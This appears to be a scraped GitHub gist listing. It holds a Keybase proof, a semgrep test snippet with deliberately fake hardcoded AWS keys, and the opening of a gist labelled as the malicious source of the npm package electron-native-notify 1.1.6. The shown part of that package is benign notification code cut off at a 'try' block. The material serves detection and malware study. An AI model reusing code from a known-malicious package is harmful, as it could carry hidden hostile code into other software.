Skip to content

Instantly share code, notes, and snippets.

### Keybase proof
I hereby claim:
* I am ievans on github.
* I am ine (https://keybase.io/ine) on keybase.
* I have a public key whose fingerprint is 0648 2CC1 32C2 7605 DCA2 58FC 1C15 BAC3 828F 78C2
To claim this, I am signing this object:
# Prompt: Find all instances of boto3.client usage where someone has hardcoded the "aws_secret_access_key".
import boto3 as b3
import os
# semgrep should fire here
client = b3.client(
's3',
aws_secret_access_key = "jWnyeKHgaSRZVd_THIS_IS_FAKE_EsvPLRKNZCYRXRL",
aws_access_key_id = "AKIAIOSFO_THIS_IS_FAKE_DNN7652GQNB")
@ievans
ievans / index.js
Created June 6, 2019 17:49
electron-native-notify-1.1.6 malicious source code
const MainProcessNotification = require("electron").Notification;
const isRenderer = process && process.type === "renderer";
const isSupported = () => isRenderer ? "Notification" in window : MainProcessNotification.isSupported();
const renderNotify = (title, body) => {
const notification = new Notification(title, {
body: body
});
return notification
};
try {